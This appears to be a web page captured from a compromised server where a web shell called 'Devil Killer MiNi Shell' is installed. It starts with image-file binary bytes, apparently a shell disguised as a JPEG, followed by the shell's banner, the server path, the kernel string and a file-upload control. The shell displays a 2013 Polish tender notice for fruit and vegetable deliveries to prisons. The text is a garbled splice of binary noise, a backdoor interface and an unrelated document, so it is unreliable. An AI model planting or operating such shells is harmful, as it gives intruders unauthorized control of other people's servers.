JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130214/23547-N-2013.html

<p class="kh_header"><b>Gdańsk: Dostawy warzyw i owoców ,znak sprawy: 2/2013/BIGB O/POTULICE</b><br>
<b>Numer ogłoszenia: 23547 - 2013; data zamieszczenia: 14.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bałtycka Instytucja Gospodarki Budżetowej BALTICA , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 58 3231102, faks 58 3231101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bigb-baltica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: IGB.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy warzyw i owoców ,znak sprawy: 2/2013/BIGB O/POTULICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III. Dostawy warzyw i owoców:

Lp.
Przedmiot zamówienia
Grupa 1

ZK Potulice
Grupa 2

AŚ Bydgoszcz, ZK Koronowo,
ZK Bydgoszcz-Fordon,
AŚ Chojnice
Grupa 3

ZK Nr 1 Grudziądz, 
ZK Nr 2 Grudziądz
Grupa 4

AŚ Inowrocław,
AŚ Toruń, 
ZK Włocławek
1. 
Ziemniaki jadalne - o średniej wielkości, tzn. o przeciętnej średnicy ok. 6 cm, przeciętnej długości ok. 8 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord, jednostka miary kilogram.
CPV: 03212100-6.
ilość szacunkowa: 1500 kg
ilość szacunkowa: 1200 kg
Nie dotyczy
Nie dotyczy
2. 
Marchew - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, jednostka miary kilogram.
CPV: 03221112-4
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
Nie dotyczy
Nie dotyczy
3. 
Kapusta czerwona - w główkach, o minimalnej wadze główki 2,5 kg, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 300 kg
ilość szacunkowa: 200 kg
Nie dotyczy
Nie dotyczy
4. 
Groch łuskany, połówki, jednostka miary kilogram.
CPV: 03221220-4. 
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
Nie dotyczy
Nie dotyczy
5. 
Fasola typu Jaś, duża, jednostka miary kilogram.
CPV: 03221210-1. 
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
Nie dotyczy
Nie dotyczy
6. 
Cebula - średniej wielkości, jednostka miary kilogram.
CPV: 03221112-1. 
ilość szacunkowa: 2000 kg
ilość szacunkowa: 1500 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 300 kg
7. 
Burak ćwikłowy - średniej wielkości, jednostka miary kilogram.
CPV: 03221111-7. 
ilość szacunkowa: 600 kg
ilość szacunkowa: 400 kg
Nie dotyczy
Nie dotyczy
8. 
Pietruszka korzeń - bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3 cm do 4 cm i długości od 12 cm do 15 cm, jednostka miary kilogram.
CPV: 03221100-7. 
ilość szacunkowa: 
100 kg
ilość szacunkowa: 
60 kg
Nie dotyczy
Nie dotyczy
9. 
Nać pietruszki - o przeciętnej wadze pęczka ok. 100 g i maksymalnej długości 15 cm jednostka miary kilogram.
CPV: 03221300-9.
ilość szacunkowa: 
50 kg
ilość szacunkowa: 
50 kg
Nie dotyczy
Nie dotyczy
10. 
Koper - o przeciętnej wadze pęczka ok. 100g i maksymalnej długości 15 cm, jednostka miary kilogram.
CPV: 03221300-9.
ilość szacunkowa: 
50 kg
ilość szacunkowa: 
50 kg
Nie dotyczy
Nie dotyczy
11. 
Ogórek zielony - twardy, średniej wielkości, w całości, polny, jednostka miary kilogram.
CPV: 03221270-9. 
ilość szacunkowa: 700 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
12. 
Papryka surowa - czerwona, cała, jednostka miary kilogram.
CPV: 03221230-7. 
ilość szacunkowa: 300 kg
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
13. 
Pieczarka - o średniej wielkości, tzn. zamknięte kapelusze o średnicy od 3cm do 5cm, jednostka miary kilogram.
CPV: 03221260-6. 
ilość szacunkowa: 500 kg
ilość szacunkowa: 300 kg
Nie dotyczy
Nie dotyczy
14. 
Pomidor - czerwony, cały, średniej wielkości, polny, jednostka miary kilogram.
CPV: 03221240-0. 
ilość szacunkowa: 500 kg
ilość szacunkowa: 600 kg
ilość szacunkowa: 600 kg
ilość szacunkowa: 600 kg
15. 
Por - oczyszczony, gruby, w całości, jednostka miary kilogram.
CPV: 03222230-4. 
ilość szacunkowa: 
100 kg
ilość szacunkowa: 
50 kg
Nie dotyczy
Nie dotyczy
16. 
Seler - duży, oczyszczony, bez liści, jednostka miary kilogram.
CPV: 03221100-7. 
ilość szacunkowa:
20 kg
ilość szacunkowa: 
20 kg
ilość szacunkowa: 
20 kg
ilość szacunkowa: 
20 kg
17. 
Kapusta włoska - w główkach, o wadze główki od 1,8 kg do 4,0 kg, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 100 kg
ilość szacunkowa: 100 kg
Nie dotyczy
Nie dotyczy
18. 
Kapusta biała - w główkach, o wadze główki od 2 kg do 4 kg, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 500 kg
ilość szacunkowa: 200 kg
Nie dotyczy
Nie dotyczy
19. 
Kapusta pekińska - w główkach, o minimalnej średnicy 10 cm i minimalnej długości 20 cm, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 400 kg
ilość szacunkowa: 300 kg
Nie dotyczy
Nie dotyczy
20. 
Cukinia - jednostka miary kg.
CPV: 03221310-2.
ilość szacunkowa:  200  kg
ilość szacunkowa:  200  kg
Nie dotyczy
Nie dotyczy
21. 
Sałata głowiasta kl. I, - jednostka miary szt.
CPV: 03221310-2.
ilość szacunkowa: 200 szt.
ilość szacunkowa: 200 szt.
ilość szacunkowa: 50 szt.
ilość szacunkowa: 50 szt.
22. 
Sałata lodowa główka  -  jednostka miary szt.
CPV: 03221310-2. 
ilość szacunkowa: 300 szt.
ilość szacunkowa: 300 szt.
Nie dotyczy
Nie dotyczy
23. 
Sałata karbowana czerwona główka,  jednostka miary szt.
CPV: 03221310-2. 
ilość szacunkowa: 150 szt.
ilość szacunkowa: 150 szt.
Nie dotyczy
Nie dotyczy
24. 
Kalafior, jednostka miary szt.
CPV: 03221420-6.
ilość szacunkowa: 500 szt.
ilość szacunkowa: 500 szt.
ilość szacunkowa: 
50 szt.
ilość szacunkowa: 
50 szt.
25. 
Brokuły, jednostka miary szt.
CPV: 03221430-9. 
ilość szacunkowa: 500 szt.
ilość szacunkowa: 500 szt.
ilość szacunkowa: 
50 szt.
ilość szacunkowa: 50 szt.
26. 
Pomidor koktajlowy tacka 500 g, jednostka miary szt.
CPV: 03221240-0. 
ilość szacunkowa: 150 szt.
ilość szacunkowa: 150 szt.
ilość szacunkowa: 150 szt.
ilość szacunkowa: 150 szt.
27. 
Rzodkiewka - jednostka miary szt.
CPV: 03221100-7. 
ilość szacunkowa: 500 szt.
ilość szacunkowa: 500 szt.
ilość szacunkowa: 500 szt.
ilość szacunkowa: 500 szt.
28. 
Mięta świeża doniczka, jednostka miary szt.
CPV: 03121100-6. 
ilość szacunkowa: 
50 szt.
ilość szacunkowa: 
30 szt.
Nie dotyczy
Nie dotyczy
29. 
Bazylia świeża doniczka,  jednostka miary szt.
CPV: 03121100-6.
ilość szacunkowa: 
50 szt.
ilość szacunkowa: 
30 szt.
Nie dotyczy
Nie dotyczy
30. 
Czosnek - w główkach, średniej wielkości, o przeciętnej wadze główki od 35 g do 50 g, jednostka miary kilogram.
CPV: 03221100-7.
ilość szacunkowa: 
50 kg
ilość szacunkowa:
50 kg
ilość szacunkowa: 
50 kg
ilość szacunkowa: 
50 kg
31. 
Kapusta kwaszona z marchewką - bez konserwantów, jednostka miary kilogram.
CPV: 03221410-3. 
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
Nie dotyczy
Nie dotyczy
32. 
Banan - jednostka miary kg.
CPV: 03222111-4. 
ilość szacunkowa: 800 kg
ilość szacunkowa: 800 kg
ilość szacunkowa: 800 kg
ilość szacunkowa: 800 kg
33. 
Grejpfrut - jednostka miary kg.
CPV: 03222230-4. 
ilość szacunkowa: 400 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
34. 
Winogrono zielone - jednostka miary kg.
CPV: 032222340-8. 
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
35. 
Winogrono fioletowe - jednostka miary kg.
CPV: 032222340-8. 
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
36. 
Gruszki - jednostka miary kg.
CPV: 03222322-6. 
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
ilość szacunkowa: 400 kg
37. 
Kiwi - jednostka miary kg.
CPV: 03222118-3. 
ilość szacunkowa: 
150 kg
ilość szacunkowa: 
250 kg
ilość szacunkowa: 
250 kg
ilość szacunkowa: 
150 kg
38. 
Pomarańcze - jednostka miary kg.
CPV: 03222200-1.
ilość szacunkowa: 2000 kg
ilość szacunkowa: 2000 kg
ilość szacunkowa: 1000 kg
ilość szacunkowa: 1000 kg
39. 
Mandarynki - jednostka miary kg. 
CPV: 03222240-7. 
ilość szacunkowa: 3000 kg
ilość szacunkowa: 3000 kg
ilość szacunkowa: 3000 kg
ilość szacunkowa: 3000 kg
40. 
Cytryny, jednostka miary kilogram.
CPV: 03222210-8. 
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
41. 
Jabłka - całe, średniej wielkości, jednostka miary kilogram.
CPV: 03222321-9. 
ilość szacunkowa: 2000 kg
ilość szacunkowa: 2000 kg
ilość szacunkowa: 2000 kg
ilość szacunkowa: 2000 kg
42. 
Fasolka szparagowa (sezonowo),  jednostka miary kg.
CPV: 03221212-0. 
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
Nie dotyczy
Nie dotyczy
43. 
Wiśnie (sezonowo),  jednostka miary kg.
CPV: 03222333-6. 
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
ilość szacunkowa: 200 kg
44. 
Śliwki (sezonowo),    jednostka miary kg.
CPV: 03222334-3. 
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
45. 
Brzoskwinia (sezonowo),  jednostka miary kg.
CPV: 03222332-9. 
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
ilość szacunkowa: 300 kg
46. 
Truskawki (sezonowo) , pakowane w łubianki do 3 kg , jednostka miary kg.
CPV: 03222313-0.
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg
ilość szacunkowa: 500 kg

1. Zamówienie zostało podzielone na 4 grupy (części):
1) Grupa 1 - dostawy do Zakładu Karnego w Potulicach, ul. Aleja Parkowa 1.
2) Grupa 2 - dostawy do: 
a) Aresztu Śledczego w Bydgoszczy, ul. Wały Jagiellońskie 4;
b) Zakładu Karnego w Bydgoszczy-Fordonie, ul. Rynek 8;
c) Zakładu Karnego w Koronowie, ul. Bydgoska 27;
d) Aresztu Śledczego w Chojnicach, ul. Pietruszkowa 4.
3) Grupa 3 - dostawy do: 
a) Zakładu Karnego Nr 1 w Grudziądzu, ul. Wybickiego 10/22;
b) Zakładu Karnego Nr 2 w Grudziądzu, ul. Sikorskiego 13/17.
4) Grupa 4 - dostawy do: 
a) Aresztu Śledczego w Inowrocławiu, ul. Gabriela Narutowicza 46;
b) Aresztu Śledczego w Toruniu, ul. Piekary 53;
c) Zakładu Karnego we Włocławku, ul. Bartnicka 10.
2. Ilości szacunkowe dostarczanych artykułów mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów będzie wynikała z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy.
3. Dostarczane warzywa i owoce mają być dojrzałe, świeże, czyste, bez oznak: zepsucia, zgnilizny oraz choroby.
4. Miejsce, sposób, terminy dostaw oraz forma i termin płatności.
1) Wykonawca dostarczać będzie ww. artykuły na swój koszt, w sposób zapobiegający utracie walorów użytkowych do magazynów Zamawiającego zlokalizowanych na terenie:
a) Zakładu Karnego w Potulicach, ul. Aleja Parkowa 1 - (grupa 1);
b) Aresztu Śledczego w Bydgoszczy, ul. Wały Jagiellońskie 4 - (grupa 2);
c) Zakładu Karnego w Bydgoszczy-Fordonie, ul. Rynek 8 - (grupa 2);
d) Zakładu Karnego w Koronowie, ul. Bydgoska 27 - (grupa 2);
e) Aresztu Śledczego w Chojnicach, ul. Pietruszkowa 4 - (grupa 2);
f) Zakładu Karnego Nr 1 w Grudziądzu, ul. Wybickiego 10/22 - (grupa 3);
g) Zakładu Karnego Nr 2 w Grudziądzu, ul. Sikorskiego 13/17 - (grupa 3);
h) Aresztu Śledczego w Inowrocławiu, ul. Gabriela Narutowicza 46 - (grupa 4);
i) Aresztu Śledczego w Toruniu, ul. Piekary 53 - (grupa 4);
j) Zakładu Karnego we Włocławku, ul. Bartnicka 10 - (grupa 4).
2) Realizacja dostaw do magazynu w uzgodnionych terminach, w godz. 8:00-12:00.
3) Termin płatności: 30 dni, forma płatności: przelew..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 03.22.11.00-6, 03.22.14.10-3, 03.22.12.20-4, 03.22.11.12-1, 03.22.11.00-7, 03.22.13.00-9, 03.22.21.11-4, 03.22.21.18-3, 03.22.22.40-7, 03.22.22.10-8, 03.12.11.00-6, 03.22.23.13-0, 03.22.23.32-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Uprawnienia do wykonywania określonej działalności lub czynności ,jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału z postępowania zostanie dokonana na zasadzie :spełnia lub nie spełnia poszczególne warunki.Zamawiający dokona oceny spełniania poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia , o którym mowa w siwz rozdział VIII , tj.10podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału z postępowania zostanie dokonana na zasadzie :spełnia lub nie spełnia poszczególne warunki.Zamawiający dokona oceny spełniania poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia , o którym mowa w siwz rozdział VIII , tj.10podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału z postępowania zostanie dokonana na zasadzie :spełnia lub nie spełnia poszczególne warunki.Zamawiający dokona oceny spełniania poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia , o którym mowa w siwz rozdział VIII , tj.10podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału z postępowania zostanie dokonana na zasadzie :spełnia lub nie spełnia poszczególne warunki.Zamawiający dokona oceny spełniania poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia , o którym mowa w siwz rozdział VIII , tj.10podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz)1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2) posiadania wiedzy i doświadczenia;
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.

IX.	Oświadczenia i dokumenty, jakie wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu.
1. W celu wykazania spełniania przez wykonawców warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII pkt 1, których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII pkt 3, wykonawca składa do oferty następujące dokumenty:
1)	podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do siwz).
2. W celu wykazania braku podstaw do wykluczenia wykonawców z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 1 ustawy Pzp, tj. warunków określonych w niniejszej siwz w rozdziale VIII pkt 2, których opis sposobu oceny spełniania został dokonany w ogłoszeniu o zamówieniu oraz w niniejszej siwz - rozdział VIII pkt 3, wykonawca składa do oferty następujące dokumenty:
1)	podpisane oświadczenie o braku podstaw do wykluczenia (załącznik nr 3 do siwz);
2)	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp (załącznik nr 3 do siwz).
3. Wyjaśnienia:
1) Wykonawcy wspólnie ubiegających się o zamówienie (np. konsorcjum, spółka cywilna) do oferty dołączają:
a) pełnomocnictwo, o którym mowa w art. 23 ust. 2 ustawy Pzp, które zawiera m.in.: nazwy i adresy członków np. konsorcjum lub spółki cywilnej, nazwę i adres pełnomocnika, zakres pełnomocnictwa, datę udzielenia pełnomocnictwa oraz podpisy przedstawicieli członków np. konsorcjum, spółki cywilnej - zgodnie z zasadami reprezentacji;
b) oświadczenie wyszczególnione w pkt 1 ppkt 1) podpisane przez pełnomocnika lub wszystkich uprawnionych przedstawicieli członków np. konsorcjum, spółki cywilnej - zgodnie z zasadami reprezentacji;
c) dokumenty wyszczególnione w pkt 2 ppkt 1) i ppkt 2) złożone przez poszczególnych (wszystkich) wykonawców tworzących np. konsorcjum, spółkę cywilną.
2) Wszystkie dokumenty i oświadczenia wymienione w rozdziale IX w pkt 1 i w pkt 2 mają być złożone w formie oryginału lub kserokopii. Jeżeli wykonawca przedłoży kserokopię dokumentu to potwierdza go i podpisuje na każdej stronie przez osobę(y) uprawnioną do podpisania oferty, z dopiskiem za zgodność z oryginałem.
3) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w rozdziale IX w pkt 2 ppkt 2) składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsca zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Niniejszy dokument, powinny być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4) Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w rozdziale IX pkt 3 ppkt 3) (powyżej), zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ppkt 3) stosuje się odpowiednio.
5) Dokumenty sporządzone w języku obcym składane są do oferty wraz z tłumaczeniem na język polski.
6) W przypadku wątpliwości interpretacyjnych dotyczących rodzajów dokumentów oraz formy ich składania w niniejszym postępowaniu, rozstrzygającym jest Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009r. Nr 226, poz. 1817).

X.	Sposób porozumiewania się zamawiającego z wykonawcami oraz przekazywanie oświadczeń i dokumentów.
1. Oświadczenia, wnioski, zawiadomienia, wyjaśnienia oraz inne informacje zamawiający i wykonawcy przekazują pisemnie lub faksem. Korespondencję uważa się za złożoną w terminie, jeżeli jej treść dotarła do zamawiającego przed upływem terminu (do godz. 15:00).
